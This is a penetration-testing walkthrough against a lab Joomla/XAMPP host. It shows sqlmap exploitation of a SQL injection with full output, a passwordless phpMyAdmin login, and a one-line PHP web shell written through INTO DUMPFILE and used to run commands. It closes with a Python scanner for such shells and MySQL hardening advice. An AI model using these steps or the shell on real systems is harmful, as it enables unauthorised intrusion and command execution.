The first step is to search the site for SQL injection vulnerabilities, and I found one at this URL: http://192.168.56.103/joomla/index.php?option=com_aardvertiser&cat_name=user&task=view
Now, try to inject it with sqlmap using this syntax:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.103/joomla/index.php?" --data "option=com_aardvertiser&cat_name=user&task=view" -p cat_name --dbs
The result is:
[03:18:19] [WARNING] POST parameter 'cat_name' is not injectable
[03:18:19] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details
[*] shutting down at: 03:18:19
My sqlmap syntax did not work, so now I try again with higher values for level and risk, and the syntax becomes:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.103/joomla/index.php?" --data "option=com_aardvertiser&cat_name=user&task=view" -p cat_name --dbs --level=5 --risk=3
The result is:
[03:21:02] [INFO] checking if the injection point on POST parameter 'cat_name' is a false positive
POST parameter 'cat_name' is vulnerable. Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points with a total of 537 HTTP(s) requests:
---
Place: POST
Parameter: cat_name
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: option=com_aardvertiser&cat_name=-6470' OR NOT (1875=1875)# &task=view
---
[03:21:22] [INFO] manual usage of POST payloads requires url encoding
[03:21:22] [INFO] testing MySQL
[03:21:22] [INFO] confirming MySQL
[03:21:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
[03:21:23] [INFO] fetching database names
[03:21:23] [INFO] fetching number of databases
[03:21:23] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[03:21:23] [INFO] retrieved: 6
[03:21:24] [INFO] retrieved: information_schema
[03:21:54] [INFO] retrieved: cdcol
[03:22:03] [INFO] retrieved: joomla
[03:22:14] [INFO] retrieved: mysql
[03:22:23] [INFO] retrieved: phpmyadmin
[03:22:40] [INFO] retrieved: test
available databases [6]:
[*] cdcol
[*] information_schema
[*] joomla
[*] mysql
[*] phpmyadmin
[*] test
[03:22:48] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.103'
[*] shutting down at: 03:22:48
Yes, that syntax worked and returned the databases of that site.
Now I want to view the usernames and passwords of that site's database server with this syntax:
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.103/joomla/index.php?" --data "option=com_aardvertiser&cat_name=user&task=view" -p cat_name --level=5 --risk=3 --users --password
The result is:
[03:23:37] [WARNING] the testable parameter 'cat_name' you provided is not inside the Cookie
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: cat_name
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: option=com_aardvertiser&cat_name=-6470' OR NOT (1875=1875)# &task=view
---
[03:23:37] [INFO] manual usage of POST payloads requires url encoding
[03:23:37] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5
[03:23:37] [INFO] fetching database users
[03:23:37] [INFO] fetching number of database users
[03:23:37] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[03:23:37] [INFO] retrieved: 5
[03:23:38] [INFO] retrieved: 'root'@'localhost'
[03:24:06] [INFO] retrieved: 'root'@'linux'
[03:24:28] [INFO] retrieved: 'pma'@'localhost'
[03:24:54] [INFO] retrieved: ''@'localhost'
[03:25:16] [INFO] retrieved: ''@'linux'
database management system users [5]:
[*] ''@'linux'
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'linux'
[*] 'root'@'localhost'
[03:25:33] [INFO] fetching database users password hashes
[03:25:33] [INFO] fetching database users
[03:25:33] [INFO] fetching number of password hashes for user 'root'
[03:25:33] [INFO] retrieved: 1
[03:25:34] [INFO] fetching password hashes for user 'root'
[03:25:34] [INFO] retrieved:
[03:25:35] [INFO] fetching number of password hashes for user 'pma'
[03:25:35] [INFO] retrieved: 1
[03:25:37] [INFO] fetching password hashes for user 'pma'
[03:25:37] [INFO] retrieved:
[03:25:38] [INFO] fetching number of password hashes for user ''
[03:25:38] [INFO] retrieved:
[03:25:39] [WARNING] unable to retrieve the number of password hashes for user ''
[03:25:39] [INFO] fetching number of password hashes for user ''
[03:25:39] [INFO] retrieved:
[03:25:39] [WARNING] unable to retrieve the number of password hashes for user ''
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[03:25:47] [WARNING] unknown hash Format. Please report by e-mail to sqlmap-users@lists.sourceforge.net.
[03:25:47] [WARNING] no clear password(s) found
database management system users password hashes:
[*] pma [1]:
password hash: NULL
[*] root [1]:
password hash: NULL
[03:25:47] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.103'
[*] shutting down at: 03:25:47
There is no password set on some of the users of that server.
Now I try to access phpMyAdmin on that site, and I sign in without any verification (no login password).
I look for the database directory with this SQL:
select @@datadir;
The result is:
/opt/lampp/var/mysql/
Oh, that system is running the XAMPP server package, so I know the web server directory is:
/opt/lampp/htdocs/
Yes, now I will create a backdoor on that site with SQL from phpMyAdmin, and the syntax is:
select "<?php system($_REQUEST['cmd']); ?>" into dumpfile '/opt/lampp/htdocs/joomla/cmd.php' --;
The result of that request is: Your SQL query has been executed successfully (Query took 0.0006 sec)
Now I open the URL http://192.168.56.103/joomla/cmd.php
and the result is:
Warning: system() [function.system]: Cannot execute a blank command in /opt/lampp/htdocs/joomla/cmd.php on line 1
Now I try to pass an OS command:
http://192.168.56.103/joomla/cmd.php?cmd=id
and the result is:
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
OK, now we can try other commands on that system; the crude backdoor really works.
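The dropped cmd.php has two properties a defender can key on: its content calls a command sink straight from request input, and, because mysqld wrote it through INTO DUMPFILE, it is owned by the database service account rather than the account that deploys the site. The following Python scanner is an added example and not code from the post: it walks a web root and reports both indicators. The demo web root it builds is constructed, and the expected owner uid is an assumption (the deployment account on a real host).

```python
import os
import re
import tempfile

# PHP command sinks fed directly from a request superglobal; this matches the
# one-liner the post wrote with INTO DUMPFILE.
_SHELL_SINK = re.compile(
    r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*"
    r"\$_(?:REQUEST|GET|POST|COOKIE)\b",
    re.IGNORECASE,
)


def scan_webroot(root: str, expected_uid=None) -> list:
    """Return sorted (relative path, reason) findings for suspicious PHP files.

    expected_uid is the deploy account that should own every file under the web
    root; it defaults to the current user. A PHP file owned by anyone else
    (e.g. the mysql service account) is reported even if its content looks benign.
    """
    if expected_uid is None:
        expected_uid = os.getuid()
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            st = os.stat(path)
            if st.st_uid != expected_uid:
                findings.append((rel, f"owner uid {st.st_uid} != expected {expected_uid}"))
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                head = fh.read(65536)  # the shell is a one-liner; no need to read more
            if _SHELL_SINK.search(head):
                findings.append((rel, "command sink fed by request input"))
    return sorted(findings)


def build_demo_webroot() -> str:
    """Create a constructed web root: one benign page and one dropped shell."""
    root = tempfile.mkdtemp(prefix="htdocs_demo_")
    os.makedirs(os.path.join(root, "joomla"))
    with open(os.path.join(root, "joomla", "index.php"), "w") as fh:
        fh.write("<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>\n")
    with open(os.path.join(root, "joomla", "cmd.php"), "w") as fh:
        fh.write("<?php system($_REQUEST['cmd']); ?>")  # same shape as the post's dumpfile
    return root


if __name__ == "__main__":
    for rel, reason in scan_webroot(build_demo_webroot()):
        print(f"{rel}: {reason}")
```

On the server side, setting secure_file_priv in my.cnf and granting application accounts no FILE privilege removes the INTO DUMPFILE write path, and giving every MySQL account (including root and the anonymous ''@'localhost' entries listed above) a password closes the phpMyAdmin door that made it reachable.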